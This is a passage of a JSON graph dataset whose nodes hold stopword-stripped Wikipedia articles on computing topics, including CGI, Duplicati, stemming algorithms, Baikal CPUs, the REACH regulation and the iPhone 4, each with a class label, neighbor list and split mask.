codice_7 instead simply sending file codice_8 web browser http server runs specified script passes output script web browser anything script sends standard output passed web client instead shown on-screen terminal window remarked cgi standard defines additional information passed request passed script instance slash additional directory name appended url immediately name script example codice_9 path stored codice_10 environment variable script called parameters sent script via http get request question mark appended url followed param=value pairs example codice_11 parameters stored codice_12 environment variable script called parameters sent script via http post request passed script standard input script read environment variables data standard input adapt web browser request following perl program shows environment variables passed web server web browser issues request environment variables codice_13 64-bit windows 7 web server running cygwin returns following information variables defined cgi standard codice_10 codice_12 ones starting codice_16 pass information along http request environment seen web browser firefox running windows 7 pc web server apache running system emulates unix cgi script named codice_17 program could generate content write standard output web server transmit browser following environment variables passed cgi programs program returns result web server form standard output beginning header blank line header encoded way http header must include mime type document returned headers supplemented web server generally forwarded response back user simple cgi program written python 3 along html handles simple addition problem doctype html html /html import cgi import cgitb cgitb.enable input_data cgi.fieldstorage print 'content-type text/html html following print leave blank line print h1 addition results /h1 try except print p 0 1 2 /p '.format num1 num2 num1 num2 python 3 cgi gets inputs html adds two numbers together web server supports cgi configured interpret url serves reference cgi script common convention codice_42 directory base directory tree treat executable files within directory security cgi scripts another popular convention use filename extensions instance cgi scripts consistently given extension codice_43 web server configured interpret files cgi scripts convenient required many prepackaged scripts opens server attack remote user upload executable code proper extension case http put posts user-submitted data provided program via standard input web server creates subset environment variables passed adds details pertinent http environment cgi often used process inputs information user produce appropriate output example cgi program one implementing wiki user agent requests name entry web server executes cgi cgi program retrieves source entry page one exists transforms html prints result web server receives input cgi transmits user agent edit page link clicked cgi populates html codice_44 editing control page contents saves back server user submits form calling command generally means invocation newly created process server starting process consume much time memory actual work generating output especially program still needs interpreted compiled command called often resulting workload quickly overwhelm server overhead involved process creation reduced techniques fastcgi prefork interpreter processes running application code entirely within web server using extension modules mod_perl mod_php another way reduce overhead use precompiled cgi programs e.g writing languages c c++ rather interpreted compiled-on-the-fly languages perl php implementing page generating software custom webserver module alternative approaches include optimal configuration web application depends application-specific details amount traffic complexity transaction tradeoffs need analyzed determine best implementation given task time budget web frameworks offer alternative using cgi scripts interact user agents",
    "neighbors": [
      11269,
      8204,
      9229,
      7695,
      1556,
      7188,
      9245,
      5663,
      7212,
      10284,
      4658,
      10815,
      5196,
      6229,
      7784,
      9834,
      9841,
      4725,
      124,
      10387,
      1692,
      2717,
      8350,
      3744,
      8354,
      679,
      7847,
      7338,
      3245,
      1211,
      4797,
      11466,
      5849,
      6366,
      8414,
      225,
      4837,
      8941,
      1802,
      10506,
      9997,
      3343,
      11024,
      8994,
      10020,
      2853,
      10026,
      2364,
      3395,
      4423,
      3404,
      3920,
      10579,
      4439,
      10588,
      2398,
      865,
      10593,
      9580,
      10611,
      5492,
      10622,
      4485,
      8582,
      1937,
      11154,
      5012,
      11167,
      1952,
      9125,
      11688,
      2478,
      4529,
      1468,
      10177,
      3522,
      8132,
      8644,
      7626,
      5077,
      5078,
      5593,
      4059,
      9193,
      3562,
      5612,
      8689,
      2045,
      9726,
      10239
    ],
    "mask": "None"
  },
  {
    "node_id": 2486,
    "label": 7,
    "text": "Intelliquip:intelliquip intelliquip llc develops browser-based software also known intelligent front-end basic function company software automate front-end sales process complex equipment software specialized fluid handling equipment industry compatible pumps compressors valves blowers turboexpanders heat exchangers actuators filters seals couplings motors variable-frequency drives intelliquip browser-based software incorporates concept software service saas means deploy subscription-based hosted service users access via internet without need install software user computer saas platform intelliquip ’ intelligent front-end allows clients deploy selection configuration solutions equipment directly internal sales force sales channels company licensed fpx llc patented core configurator engine use software intelliquip also member hydraulic institute largest association pump industry manufacturers north america part hydraulic institute electronic data exchange committee participate project fiatech adopt aex cfixml schemas implement intelliquip software initiative developing standards automate information exchange design procurement delivery installation operation maintenance engineered equipment",
    "neighbors": [
      467,
      4309
    ],
    "mask": "Test"
  },
  {
    "node_id": 2487,
    "label": 4,
    "text": "Duplicati:duplicati duplicati backup client securely stores encrypted incremental compressed remote backups local files cloud storage services remote file servers duplicati supports various online backup services like onedrive amazon s3 backblaze rackspace cloud files tahoe lafs google drive also servers support ssh/sftp webdav ftp duplicati uses standard components rdiff zip aescrypt gnupg allows users recover backup files even duplicati available released terms gnu lesser general public license lgpl duplicati free software duplicati written mostly c implemented completely within clr enables cross-platform runs well 32-bit 64-bit versions windows macos linux using either .net framework mono duplicati graphical user interface wizard-style interface command-line version use headless environments interfaces use core thus set features capabilities command-line version similar duplicity interface duplicati unique features usually found commercial systems remote verification backup files disk snapshots backup open files disk snapshots performed vss windows lvm linux original duplicati project started june 2008 intended produce graphical user interface duplicity program included port duplicity code use windows dropped september 2008 work clean re-implementation began re-implementation includes sub-programs found duplicity rdiff ftp etc initial version duplicati saw initial release june 2009 2012 work duplicati 2 started complete rewrite includes new storage engine allows efficient incremental continuous backups new user interface web-based makes possible install duplicati 2 headless systems like servers nas also responsive easily used mobile devices even though duplicati 2 still beta already 20,000 active installations duplicati gui command-line interface call common component called main serves binding point operations supported currently encryption compression storage component considered subcomponent loaded runtime making possible third-party developer inject subcomponent duplicati without access source need modify duplicati license type also flexible enough allow redistribution duplicati closed-source storage provider duplicati designed independent provider possible means storage medium supports common commands get/put/list/delete work duplicati duplicity model duplicati based relies heavily components system librdiff tcftp others since duplicati intended cross-platform unlikely components available platforms duplicati re-implements components instead notably duplicati features rdiff aescrypt implementation work system supports clr runtime duplicati gui duplicati 1.x intended used single machine display attached however also possible install duplicati windows service linux daemon set duplicati system tray starting duplicati service limitation addressed duplicati 2 web interface used headless systems duplicati 1.x extremely slow file listings browsing file tree restores take long time since duplicati produces incremental backups corrupt missing incremental volume render following incremental backups next full backup useless duplicati 2 regularly tests backup detect corrupted files early duplicati 1.x stores file modification date metadata like permissions attributes addressed duplicati 2",
    "neighbors": [
      11201,
      2050,
      7364,
      6565,
      3366,
      11178,
      3819,
      5612,
      3629,
      1358,
      7983,
      3794,
      3573,
      4438,
      823,
      728
    ],
    "mask": "Test"
  },
  {
    "node_id": 2488,
    "label": 0,
    "text": "Stemming:stemming linguistic morphology information retrieval stemming process reducing inflected sometimes derived words word stem base root form—generally written word form stem need identical morphological root word usually sufficient related words map stem even stem valid root algorithms stemming studied computer science since 1960s many search engines treat words stem synonyms kind query expansion process called conflation computer program subroutine stems word may called stemming program stemming algorithm stemmer stemmer english operating stem cat identify strings cats catlike catty stemming algorithm might also reduce words fishing fished fisher stem fish stem need word example porter algorithm reduces argue argued argues arguing argus stem argu first published stemmer written julie beth lovins 1968 paper remarkable early date great influence later work area paper refers three earlier major attempts stemming algorithms professor john w. tukey princeton university algorithm developed harvard university michael lesk direction professor gerard salton third algorithm developed james l. dolby r consultants los altos california later stemmer written martin porter published july 1980 issue journal program stemmer widely used became de facto standard algorithm used english stemming dr. porter received tony kent strix award 2000 work stemming information retrieval many implementations porter stemming algorithm written freely distributed however many implementations contained subtle flaws result stemmers match potential eliminate source error martin porter released official free software mostly bsd-licensed implementation algorithm around year 2000 extended work next years building snowball framework writing stemming algorithms implemented improved english stemmer together stemmers several languages paice-husk stemmer developed chris paice lancaster university late 1980s iterative stemmer features externally stored set stemming rules standard set rules provides 'strong stemmer may specify removal replacement ending replacement technique avoids need separate stage process recode provide partial matching paice also developed direct measurement comparing stemmers based counting over-stemming under-stemming errors several types stemming algorithms differ respect performance accuracy certain stemming obstacles overcome simple stemmer looks inflected form lookup table advantages approach simple fast easily handles exceptions disadvantages inflected forms must explicitly listed table new unfamiliar words handled even perfectly regular e.g cats cat table may large languages simple morphology like english table sizes modest highly inflected languages like turkish may hundreds potential inflected forms root lookup approach may use preliminary part-of-speech tagging avoid overstemming lookup table used stemmer generally produced semi-automatically example word run inverted algorithm might automatically generate forms running runs runned runly last two forms valid constructions unlikely.. suffix stripping algorithms rely lookup table consists inflected forms root form relations instead typically smaller list rules stored provides path algorithm given input word form find root form examples rules include suffix stripping approaches enjoy benefit much simpler maintain brute force algorithms assuming maintainer sufficiently knowledgeable challenges linguistics morphology encoding suffix stripping rules suffix stripping algorithms sometimes regarded crude given poor performance dealing exceptional relations like 'ran 'run solutions produced suffix stripping algorithms limited lexical categories well known suffixes exceptions however problem parts speech well formulated set rules lemmatisation attempts improve upon challenge prefix stripping may also implemented course languages use prefixing suffixing suffix stripping algorithms may differ results variety reasons one reason whether algorithm constrains whether output word must real word given language approaches require word actually exist language lexicon set words language alternatively suffix stripping approaches maintain database large list known morphological word roots exist real words approaches check list existence term prior making decision typically term exist alternate action taken alternate action may involve several criteria non-existence output term may serve cause algorithm try alternate suffix stripping rules case two suffix stripping rules apply input term creates ambiguity rule apply algorithm may assign human hand stochastically priority one rule another algorithm may reject one rule application results non-existent term whereas overlapping rule example given english term friendlies algorithm may identify ies suffix apply appropriate rule achieve result friendl friendl likely found lexicon therefore rule rejected one improvement upon basic suffix stripping use suffix substitution similar stripping rule substitution rule replaces suffix alternate suffix example could exist rule replaces ies affects algorithm varies algorithm design illustrate algorithm may identify ies suffix stripping rule well suffix substitution rule apply since stripping rule results non-existent term lexicon substitution rule substitution rule applied instead example friendlies becomes friendly instead friendl diving details common technique apply rules cyclical fashion recursively computer scientists would say applying suffix substitution rule example scenario second pass made identify matching rules term friendly ly stripping rule likely identified accepted summary friendlies becomes via substitution friendly becomes via stripping friend example also helps illustrate difference rule-based approach brute force approach brute force approach algorithm would search friendlies set hundreds thousands inflected word forms ideally find corresponding root form friend rule-based approach three rules mentioned would applied succession converge solution chances brute force approach would slower lookup algorithms direct access solution rule-based try several options combinations choose result seems best complex approach problem determining stem word lemmatisation process involves first determining part speech word applying different normalization rules part speech part speech first detected prior attempting find root since languages stemming rules change depending word part speech approach highly conditional upon obtaining correct lexical category part speech overlap normalization rules certain categories identifying wrong category unable produce right category limits added benefit approach suffix stripping algorithms basic idea stemmer able grasp information word stemmed apply accurate normalization rules unlike suffix stripping rules also modify stem stochastic algorithms involve using probability identify root form word stochastic algorithms trained learn table root form inflected form relations develop probabilistic model model typically expressed form complex linguistic rules similar nature suffix stripping lemmatisation stemming performed inputting inflected form trained model model produce root form according internal ruleset similar suffix stripping lemmatisation except decisions involved applying appropriate rule whether stem word return word whether apply two different rules sequentially applied grounds output word highest probability correct say smallest probability incorrect typically measured lemmatisation algorithms stochastic given word may belong multiple parts speech probability assigned possible part may take account surrounding words called context context-free grammars take account additional information either case assigning probabilities possible part speech likely part speech chosen appropriate normalization rules applied input word produce normalized root form stemming techniques use n-gram context word choose correct stem word hybrid approaches use two approaches described unison simple example suffix tree algorithm first consults lookup table using brute force however instead trying store entire set relations words given language lookup table kept small used store minute amount frequent exceptions like ran run word exception list apply suffix stripping lemmatisation output result linguistics term affix refers either prefix suffix addition dealing suffixes several approaches also attempt remove common prefixes example given word indefinitely identify leading prefix removed many approaches mentioned earlier apply go name affix stripping study affix stemming several european languages found algorithms use stem database example set documents contain stem words stems mentioned necessarily valid words rather common sub-strings brows browse browsing order stem word algorithm tries match stems database applying various constraints relative length candidate stem within word example short prefix stem words would considered stem word beside .. much early academic work area focused english language significant use porter stemmer algorithm many languages investigated hebrew arabic still considered difficult research languages stemming english stemmers fairly trivial occasional problems dries third-person singular present form verb dry axes plural axe well axis stemmers become harder design morphology orthography character encoding target language becomes complex example italian stemmer complex english one greater number verb inflections russian one complex noun declensions hebrew one even complex due nonconcatenative morphology writing system without vowels requirement prefix stripping hebrew stems two three four characters multilingual stemming applies morphological rules two languages simultaneously instead rules single language interpreting search query commercial systems using multilingual stemming exist two error measurements stemming algorithms overstemming understemming overstemming error two separate inflected words stemmed root been—a false positive understemming error two separate inflected words stemmed root not—a false negative stemming algorithms attempt minimize type error although reducing one type lead increasing example widely used porter stemmer stems universal university universe univers case overstemming though three words etymologically related modern meanings widely different domains treating synonyms search engine likely reduce relevance search results example understemming porter stemmer alumnus → alumnu alumni → alumni alumna alumnae → alumna english word keeps latin morphology near-synonyms conflated stemming used approximate method grouping words similar basic meaning together example text mentioning daffodils probably closely related text mentioning daffodil without cases words morphological stem idiomatic meanings closely related user searching marketing satisfied documents mentioning markets marketing stemmers common elements query systems web search engines effectiveness stemming english query systems soon found rather limited however led early information retrieval researchers deem stemming irrelevant general alternative approach based searching n-grams rather stems may used instead also stemmers may provide greater benefits languages english stemming used determine domain vocabularies domain analysis many commercial companies using stemming since least 1980s produced algorithmic lexical stemmers many languages snowball stemmers compared commercial lexical stemmers varying results google search adopted word stemming 2003 previously search fish would returned fishing software search algorithms vary use word stemming programs simply search substrings obviously find fish fishing searching fishes find occurrences word fish",
    "neighbors": [
      5122,
      8323,
      2440,
      2059,
      6798,
      11538,
      10231,
      1044,
      5399,
      538,
      6304,
      7599,
      4531,
      3893,
      4662,
      3127,
      10557,
      6208,
      3533,
      5197,
      6223,
      8538,
      5857,
      1890,
      7780,
      9320,
      7918,
      8046,
      8688,
      119,
      8440,
      7164
    ],
    "mask": "Validation"
  },
  {
    "node_id": 2489,
    "label": 3,
    "text": "Claasen's_law:claasen law claasen logarithmic law usefulness named technologist theo a. c. m. claasen introduced idea 1999 cto philips semiconductors law also expressed system parameters e.g ram cpu speed disk capacity need increase multiple create noticeable impact performance case ram law 256mb unit practically useful 128mb unit though base unit doubled would require 16384mb 128 × 128mb unit ram truly double performance law modern car e.g ford mondeo substantially useful getting occupants b older car e.g ford model order achieve linear improvement usefulness time necessary exponential increase technology time moore law delivers exponential increase technology claasen law combined moore law implies linear improvement usefulness time",
    "neighbors": [
      2273
    ],
    "mask": "Validation"
  },
  {
    "node_id": 2490,
    "label": 3,
    "text": "Baikal_CPU:baikal cpu baikal cpu line mips arm-based microprocessors developed fabless design firm baikal electronics spin-off russian supercomputer company t-platforms judging information available online sources baikal electronics selected different approach compared russian microprocessor initiatives elbrus-2sm elbrus-8s mcst multiclet line chips design baikal electronics based existing commercial ip cores imagination technologies arm holdings compared innovative approach multiclet elbrus cpu history dating back elbrus supercomputers soviet union march 2015 synopsys inc. announced baikal electronics selected synopsys solutions accelerate design verification advanced system chips may 2015 baikal electronics imagination technologies announced first commercial baikal microprocessor based mips warrior p5600 called baikal-t1 first samples new cpu available starting june 2015 baikal-t1 mainly targets applications networking industrial automation features hardware support virtualization high performance 128-bit simd engine march 2016 announced imagination technologies blog desktop pc called tavolga terminal also known meadowsweet terminal pc available order t-platforms computer based baikal-t1 cpu sm750 graphics processing unit debian linux operating system",
    "neighbors": [
      6659,
      7687,
      1425,
      4386,
      10658,
      938,
      6957,
      7983,
      823,
      11580,
      7234,
      11333,
      2503,
      2523,
      9309,
      5358,
      1776,
      499,
      1399
    ],
    "mask": "Validation"
  },
  {
    "node_id": 2491,
    "label": 4,
    "text": "REACH_authorisation_procedure:reach authorisation procedure authorisation procedure one regulatory tools european regulation ec reach n°1907/2006 aiming ban use substances high concern svhc included annex xiv reach substitute technically economically feasible alternatives process concerns manufacturers importers downstream users substances representatives foreign manufacturers also apply authorisation authorisation today impacts many industries including aerospace electronics automotive energy paint industries moreover defence applications de facto exempted authorisation process member states must decide case case basis whether company benefit procedure outlined article 2.3 reach reach regulation relies four main procedures registration evaluation restriction authorisation chemical substances eu member states european chemicals agency request european commission submit propositions identify substances high concern based criteria laid article 57 reach work supported expert groups echa eu member states based various criteria screening methodologies order identify relevant svhcs annex xiv last step prioritisation process lists svhcs exhibit particularly high risk human health environment based inherent properties quantities uses order forbid use eu market recommendations include svhcs annex xiv made echa debated relevant stakeholders member states companies ngos etc. final decision inclusion substance annex xiv taken european commission listed annex xiv reach regulation substance therefore assigned “ sunset date ” use banned unless authorisation granted definite period time today 2015/05/26 161 substances listed candidate list 31 substances listed annex xiv candidate list usually updated every 6 months annex xiv updated every 12 18 months authorisation procedure complex concerns manufacturers importers downstream users representatives substances banning use takes effect sunset date date use substance possible companies granted authorisation submitted dossier latest application date latter indeed benefit transitional period pending eu commission final decision exception made downstream users case upstream stakeholder within supply chain granted authorisation substance use point view supply chain substance matters instance subcontractors authorised importers covered annex xiv substance use supplied via supply chain authorisation application made granted finally downstream users need apply authorisation nevertheless obligation notify use echa art 66 reach check compliance risk management measures concerned companies thus invited take measures soon substance use enters candidate list enquiring impacted actors strategies authorisation applications made one several specific uses article 3 reach thus defines “ use ” “ processing formulation consumption storage keeping treatment filling containers transfer one container another mixing production article use ” framework authorisation dossier description use applied specify market supply chain processes type articles concerned use applied consistent enough cover exposure scenario also analysis alternatives use applied mistaken identified use corresponds reach registration process identified use focuses process consider performances markets questions exceptions exist application authorisation required production article may require authorisation point finished articles require authorisation put market even though still contain substance subject authorisation consequently articles requiring use annex xiv substance still produced outside eu imported particular case future restrictions procedure could however limit placing market articles risk remains art 58.6 reach review period duration eu commission authorises use substance sunset date following durations considered review periods end review period application authorisation reassessed evaluate progress made terms research development substitution applications extend review period made latest 18 months expiry date european commission may also reduce duration new circumstances appear terms risks impacts court european union qualified rule appeals applications authorisation member states turn responsible controlling decision implementation application authorisation afa made three main parts chemical safety report csr analysis alternatives aoa socio-economic analysis sea goal dossier demonstrate alternative substance immediately available risks controlled social economic advantages use substance outweigh risks human health environment dossier usually takes 6 18 months preparation echa guidelines available assist drafting application authorisation filed latest application date lad set 18 months sunset date lad enables benefit transitional period pending european commission decision afa made one several substances case grouping need demonstrated basis annex xi reach one several uses applied one several companies latter case called joint application requires appointing main applicant contact point echa two submission routes planned reach regulation adequate control route goal chemical safety report prove threshold values respected socio-economic route goal chemical safety report demonstrate risks reduced minimum chemical safety report contains aoa aims demonstrate alternative appropriate i.e technically economically feasible less risky available analysis alternatives therefore presents substance alternative solutions contains socio-economic analysis compulsory document socio-economic route also complete application justified adequate control route aims demonstrate advantages use substance outweigh risks human health environment purpose applicants must compare two scenarios ‘ use scenario ’ continued use substance one hand ‘ non-use scenario ’ cease use substance hand discuss impacts contains dossiers submitted submission windows february may august november echa strongly advise follow windows plenary sessions two committees rac seac organised march june september december year submitting plenary sessions submission windows therefore helps efficient assessment application applications deemed received business rules check successfully passed provided echa fees paid time examination dossier carried risk assessment committee rac socio-economic analysis committee seac opens public consultation alternatives 8 weeks companies ngos interested party possibility comment possibly challenge alternatives proposed applicant consultation followed additional discussions two committees order clarify application process called trialogue stakeholders invited participate duration examination varies according complexity clarity dossier committees however obligation deliver first opinion dossier 10 months submission latest dossier committee opinion sent commission whole process take 2 years may 4 2015 28 applications authorisation filed total 56 uses dossier requires implementing specific strategy define uses analysis industrial processes associated risks alternatives socio-economic impacts banning substance committees expect dossier contain precise description industrial process operational conditions representative dossier well risk management measures implemented applicant main issue application authorisation process duration review period granted therefore critical bring necessary precisions dossiers justify requested review period duration justification weak argumentation generic may induce granting shorter-than-requested review period beyond simple drafting application authorisation dossier whole process implies expertise deep analysis company activity multiple aspects analysis therefore requires extensive collection information also possibly contacts customers strengthen analysis alternatives public consultation one core mechanisms authorisation process stakeholders ’ competing companies universities laboratories ngos member states etc involvement consultation process growing last years reach 400 comments single dossier influence comments particular concerning alternatives makes major step authorisation process order streamline process templates comments instructions available echa website consulting costs application authorisation estimated echa amounts average around 230,000 eur single use",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 2492,
    "label": 2,
    "text": "IPhone_4:iphone 4 iphone 4 smartphone designed marketed apple inc fourth generation iphone succeeding 3gs preceding 4s following number notable leaks iphone 4 first unveiled june 7 2010 apple worldwide developers conference san francisco released june 24 2010 united states united kingdom france germany japan iphone 4 introduced new hardware design iphone family apple ceo steve jobs touted thinnest smartphone world time consisted stainless steel frame doubles antenna internal components situated aluminosilicate glass iphone 4 also introduced apple new high-resolution retina display pixel density 326 pixels per inch maintaining physical size aspect ratio precursors iphone 4 also introduced apple a4 system-on-chip along ios 4—which notably introduced multitasking functionality apple new facetime video chat service iphone 4 also first iphone include front-facing camera first released version cdma networks ending period exclusive carrier iphone products united states iphone 4 received generally positive reception critics praising revamped design powerful hardware comparison previous models market success 600,000 pre-orders within 24 hours release iphone 4 plagued highly publicized reports abnormalities new antenna design caused device lose cellular signal held certain way human contact phone outer edge would cause significant decrease signal strength iphone 4 spent longest time apple flagship iphone model fifteen months although succeeding 4s announced october 2011 4 continued sold midrange model september 2012 thereafter entry-level offering apple lineup september 2013 announcement iphone 5s/iphone 5c iphone 4 longest lifespan iphone ever produced spanning close four years available developing countries early 2015 official unveiling iphone 4 june 7 2010 two prototypes brought attention media breaching apple normally secretive development process many speculations regarding technical specifications proved accurate january 27 2010 gadget website engadget received leaked images unreleased ipad unbeknownst editors readers images contained two unreleased iphone 4s n't subsequent gizmodo release aware complete contents images april 19 2010 gadget website gizmodo reported purchased iphone prototype 5000 furthermore conducted product teardown device prototype reported lost apple employee gray powell redwood city california shortly gizmodo published detailed information prototype apple legal associates formally requested phone returned apple gizmodo responded intent cooperate april 23 officers rapid enforcement allied computer team react task force california httap program raided home jason chen gizmodo editor responsible reviewing prototype seizing computers hard drives electronic frontier foundation criticized raid violating journalist source protection laws forbid seizure journalist computers well suspicion apple used influence member steering committee charged direction oversight california react task force push police action way would normally conducted type incident apple already received iphone prototype raid returned gizmodo district attorney stated investigation suspended discontinued searching gizmodo editor belongings determine whether shield laws applicable cautioned charges issued point pictures video second prototype published vietnamese website taoviet may 12 2010 almost identical first used a4 chip manufactured apple website purchased prototype 4,000 digitimes reported screen resolution new phone 960-by-640 confirmed apple iphone 4 official announcement iphone 4 available pre-order june 15 2010 customers attempting pre-order iphone 4 reported problems pre-order process us uk online apple stores crashed due surge traffic issue reported softbank apple exclusive partners united states japan respectively suspended advance sales iphone 4 demand threatened exceed supply retail stores also unable complete pre-order transactions due servers crashing apple partner carriers received 600,000 pre-orders iphone 4 first 24 hours largest number pre-orders apple received single day device point engadget reported 20:30 utc iphone 4 pre-order suppliers sold 1.7 million iphone 4s sold first three days availability iphone 4 also released orange tunisia available eight cities launch july 30 2010 iphone 4 made available sale australia new zealand 15 countries free bumper cases south korea released kt september 10 israel released september 24 cellcom pelephone orange launched thailand september 23 ais dtac true move malaysia september 26 kuala lumpur nationwide september 27 according website maxis iphone 4 released south africa september 22 vodacom mtn networks limited quantities iphone 4 launched vietnam september 30 vinaphone viettel first 3 major cities hanoi ho chi minh city da nang country end october iphone 4 launched india may 27 2011 aircel airtel january 11 2011 verizon wireless announced media event reached agreement apple would begin selling cdma iphone 4 united states ending apple exclusivity agreement verizon iphone went sale february 10 pre orders began february 3 verizon iphone includes 'personal hotspot feature allows user use iphone wireless hotspot five devices connecting one time february 3 2011 presale iphone 4 broke verizon first day sales records single device june 24 2010 apple issued statement white iphone 4 models proving challenging manufacture expected initially pushed release date back second half july lot speculation surrounding delay white iphone 4 among popular rumors concerning phone internal camera adversely affected light leaking due semi-translucent glass white paint sources report problem relates apple inability match white color front face plate home button april 27 2011 apple announced would releasing white iphone 4 model april 28 2011 gsm cdma release white iphone 4 carried april 28 apple official unveiling iphone 4s october 4 2011 announced sprint would begin carrying reconfigured cdma iphone 4 iphone 4s us october 14 september 2013 release iphone 5s iphone 5c apple stopped selling iphone 4 stores well website replaced 8 gb iphone 4s display iphone 4 manufactured lg exclusive contract apple features led backlit tft lcd capacitive touchscreen pixel density 326 pixels per inch ppi diagonally measured 960×640 display pixel 78 micrometers width display contrast ratio 800:1 screen marketed apple retina display based assertion display approximately 300 ppi distance one eye 57 arcseconds per pixel maximum amount detail human retina perceive iphone expected used distance 12 inches eyes higher resolution would allegedly effect image apparent quality maximum potential human eye already met claim disputed raymond soneira president displaymate technologies said interview wired magazine claims jobs something exaggeration reasonably close perfect display steve pushed little far soneira stated resolution human retina higher claimed apple working 477 ppi eyes 36 arcseconds per pixel however phil plait author bad astronomy whose career includes collaboration nasa regarding camera hubble space telescope responded criticism stating better 20/20 eyesight one foot away iphone 4 pixels resolved picture look pixellated average eyesight picture look fine iphone 4 features additional front-facing vga camera backside-illuminated 5 megapixel rear-facing camera 3.85 mm f/2.8 lens led flash rear-facing camera capable recording hd video 720p 30 frames per second cameras make use tap focus feature part ios 4 photo video recording rear-facing camera 5× digital zoom contrast steve jobs announcement wwdc 2010 recent federal communications commission documentation shown iphone 4 contains penta-band 3g umts antenna quad-band 3g umts radio advertised apple according fcc documentation filed apple radio inside iphone 4 supports 800 850 900 1,900 2,100 mhz 800 mhz frequency commonly used japanese mobile phones advertised supported apple however 800 mhz band subset 850 mhz band probably explains device advertised quad-band chip-sets manufactured skyworks solutions infineon gsm version apple mobile products time iphone 4 also used 30 pin dock connector external data port iphone 4 first generation iphone second microphone used noise cancellation located top unit near headphone jack main microphone bottom left iphone 4 introduces gyroscopic sensor detects 3-axis angular acceleration around x z axes enabling precise calculation yaw pitch roll gyroscope complements accelerometer sensor present since original iphone detects device acceleration shake vibration shock fall detecting linear acceleration along one three axes x z combined data accelerometer gyroscope provides detailed precise information device 6-axis movement space 3 axes gyroscope combined 3 axes accelerometer enable device recognize approximately far fast direction moved space iphone 4 powered apple a4 chip designed intrinsity like prior iphone models manufactured samsung system-on-a-chip composed arm cortex-a8 cpu integrated powervr sgx535 gpu apple a4 also used ipad clocked rated speed 1 ghz clock speed iphone 4 disclosed prior models iphone underclocked cpu typically extends battery life lowers heat dissipation iphone 4 512 mb dram additional dram supports increased performance multi-tasking iphone 4 uses micro-sim card iphone 4 devices running gsm network positioned ejectable tray located right side device cdma network however phone connects network using esn prior models used regular mini-sim cards depending operator micro-sim cards may available networks globally technical workaround possible trim mini-sim card knife scissors fits micro-sim tray prior models data stored flash memory 8 16 32 gb sim unlike prior generations storage capacity printed back unit iphone 4 features redesigned structure designed jony ive design would later reused adapted iphone 4s 5 5s se notably bulges back panel well band front back gone replaced flattened surfaces redesign reflects utilitarianism uniformity existing apple products ipad imac overall dimensions iphone 4 reduced predecessor high wide deep compared iphone 3gs high wide deep making iphone 4 24 thinner predecessor iphone 3gs steve jobs claimed thinnest smartphone planet reduced size device primarily due externally placed antenna iphone 4 structured around stainless steel frame wraps around edge phone acting primary structure device iphone 4 antennas metal band features two slits gsm version phone one lower left one top fake slit along lower right cosmetically mirror one lower left divide band two antenna sections left section band serves bluetooth wi-fi gps antenna right lower sections band act antenna gsm umts connectivity cdma version phone four slits metal band two top left right two bottom divides metal band four different segments like gsm version phone serves different antennas connectivity top portion band divided top left right slits connecting cdma network left portion metal band bluetooth wi-fi gps like gsm version right side antenna serves cosmetically mirror left side also create similar look gsm version phone internal components situated two panels aluminosilicate glass described apple chemically strengthened 20 times stiffer 30 times harder plastic theoretically allowing scratch resistant durable prior models fall 2010 pentalobe screws started replace philips screws used post-repair units us production units japan iphone 4 shipped ios 4 newest version apple ios mobile operating system time ios 4 introduced multitasking system allowing apps remain suspended memory perform certain operations background allowing users switch apps using on-screen menu also introduced facetime allows users perform video calls iphone ipad ipod touch os x users iphone 4 supports ios 7 released september 2013 due relatively aged hardware iphone 4 certain features available newer iphone models available device ios 7 include siri 3d maps turn-by-turn navigation airdrop airplay mirroring live camera filters panorama mode certain visual effects introduced ios 7 blurring translucent interface elements parallax effect home screen live wallpapers still subject limitations ios 7.1 bring slight performance improvements operating system iphone 4. ios 7 specifically ios 7.1.2 last version ios support iphone 4 unlike iphone 4s iphone 4 receive ios 8 update due performance issues iphone 4 bumper ring rubber plastic surrounds edge iphone 4 purpose protecting phone inner part rubber external band made plastic bumper wraps around edges device protecting edges lesser extent screen bumper cover front rear phone though slightly raise iphone whatever surface sitting additionally plastic band houses metallic buttons volume controls sleep/wake button six holes bumper enable access mute switch dock connector headphone jack speaker microphones apple updated bumper wider volume switch hole release iphone 4 cdma network updated bumper also compatible iphone 4s next generation iphone identical exterior design measurements iphone 4 cdma pre-release reception generally positive announcement included information covered gizmodo fox news commented seeing action far informative staring gizmodo photos busted test unit rhodri marsden independent said aside introduction face-to-face video calling staggering feature set instead focusing device powerful predecessor speedier easier use make previously laborious tasks seem like cinch cnet reacted announcement explaining believes imovie ios exciting part year wwdc keynote article noted iphone 4 unlike current cameras record hd content edit device labeling true mobile editing suite reviews iphone 4 generally favorable walt mossberg wall street journal called device best device class engadget named best smartphone market june 2010 cnet gave iphone 4 rating 8.6 10 one highest ratings given smartphone techradar gave device 4.5/5 stars consumer reports said signal problem reason rate recommended model although tests ranked highest among smart phones joshua topolsky engadget described device industrial design detailed sophisticated predecessor users reported yellow discoloration screen disappeared several days attributed glass lamination glue used time dry fully unit reached consumers due speed manufacturing another issue reported users within days iphone 4 release calls proximity sensor insensitive facial contact touchscreen end calls mute calls dial numbers users reported particularly low-light conditions photos taken iphone 4 sometimes contained blue green splotches issues white balance also discovered particularly using flash shortly iphone 4 launched consumers reported signal strength phone reduced touching lower left edge phone bridging one two locations separates two antennas resulting dropped calls areas lower signal reception response apple issued statement advising customers avoid gripping phone lower left corner making receiving call consequence problem reported july 2 2010 several iphone 4 users planning suing apple fraud concealment negligence intentional misrepresentation defective design legal challenge started law firm set website recruit disenchanted iphone 4 buyers lawsuit apple later day apple issued another statement stating discovered cause dramatic drop bars apple explained formula used calculate number bars display wrong apple promised correct issue release software update within weeks would address mistake present since original iphone new york times commented failure detect longstanding problem earlier astonishing consumer reports initially stated iphone 4 signal issues unique may serious continued mention signal loss problem faced entire smartphone industry problem apple made formal apology next day magazine altered stance encountering instances dropped calls magazine rejected apple explanation conducting tests controlled environment comparing results prior generations iphone sarcastically pointed using piece tape cover lower left antenna gap one way fix problem recommended consumers want iphone works well without masking-tape fix purchase iphone 3gs instead magazine also tested iphone 4 wearing bumper frame-like cover sold apple prevents direct contact antenna reporting resolve problem cnn repeated consumer reports statement small amount duct tape proven effective fix iphone 4 dropped call issue july 16 2010 press conference steve jobs announced apple would provide iphone 4 owners free case help solve antenna issue refund users already purchased bumper free case offer would valid september 30 2010 apple would re-evaluate situation get free case owners able apply via app installed phone found app store july 22 2010 september 30 2010 jobs also announced apple could produce enough bumpers owners phone would source supply offer range cases additionally jobs cited figures applecare showed 0.55 percent iphone 4 users complained company issue number phones returned apple 1.7 